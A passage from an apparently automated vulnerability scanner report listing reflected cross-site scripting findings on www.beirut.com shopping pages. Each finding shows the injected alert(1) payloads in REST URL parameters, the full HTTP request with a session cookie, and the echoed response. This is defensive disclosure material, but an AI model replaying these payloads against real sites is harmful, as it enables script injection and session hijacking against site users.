User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:05:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping4de26"><a>34b6c8001fc">
...[SNIP]...

4.870. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cf57'-alert(1)-'e69a37a240c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping1cf57'-alert(1)-'e69a37a240c/Consumer-Goods/235690923/Flowers/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:17:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping1cf57'-alert(1)-'e69a37a240c/Consumer-Goods/235690923/Flowers/17';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.871. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a81a'-alert(1)-'1956de7bef2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods7a81a'-alert(1)-'1956de7bef2/235690923/Flowers/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:23:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods7a81a'-alert(1)-'1956de7bef2/235690923/Flowers/17';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.872. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1147e<script>alert(1)</script>19941d15beb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goods1147e<script>alert(1)</script>19941d15beb/235690923/Flowers/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:24:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goods1147e<script>alert(1)</script>19941d15beb <a href="#" id="backlink">
...[SNIP]...

4.873. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85888'-alert(1)-'9e0400966d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/23569092385888'-alert(1)-'9e0400966d6/Flowers/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:30:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/23569092385888'-alert(1)-'9e0400966d6/Flowers/17';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.874. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7243f'-alert(1)-'89531dee816 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Flowers7243f'-alert(1)-'89531dee816/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:40:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923/Flowers7243f'-alert(1)-'89531dee816/17';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.875. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1aed1'-alert(1)-'8b3b0deab09 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Flowers/171aed1'-alert(1)-'8b3b0deab09 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:43:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923/Flowers/171aed1'-alert(1)-'8b3b0deab09';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.876. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85667'-alert(1)-'a605d5bdfc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping85667'-alert(1)-'a605d5bdfc/Consumer-Goods/235690923/Health-Products/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:15:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping85667'-alert(1)-'a605d5bdfc/Consumer-Goods/235690923/Health-Products/77';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.877. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49197"><a>b145eaef40b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping49197"><a>b145eaef40b/Consumer-Goods/235690923/Health-Products/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:08:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping49197"><a>b145eaef40b">
...[SNIP]...

4.878. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 63f65<script>alert(1)</script>40eb55dc44b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goods63f65<script>alert(1)</script>40eb55dc44b/235690923/Health-Products/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:21:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goods63f65<script>alert(1)</script>40eb55dc44b <a href="#" id="backlink">
...[SNIP]...

4.879. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d838'-alert(1)-'72d3d985711 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods6d838'-alert(1)-'72d3d985711/235690923/Health-Products/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:21:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods6d838'-alert(1)-'72d3d985711/235690923/Health-Products/77';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.880. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ea9'-alert(1)-'a6c4d22974 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923c8ea9'-alert(1)-'a6c4d22974/Health-Products/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:27:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Consumer-Goods/235690923c8ea9'-alert(1)-'a6c4d22974/Health-Products/77';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.881. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3dfd'-alert(1)-'90e1ff14236 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Health-Productsf3dfd'-alert(1)-'90e1ff14236/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:33:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Health-Productsf3dfd'-alert(1)-'90e1ff14236/77';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.882. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e77b'-alert(1)-'535dd4f02cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Health-Products/777e77b'-alert(1)-'535dd4f02cb HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
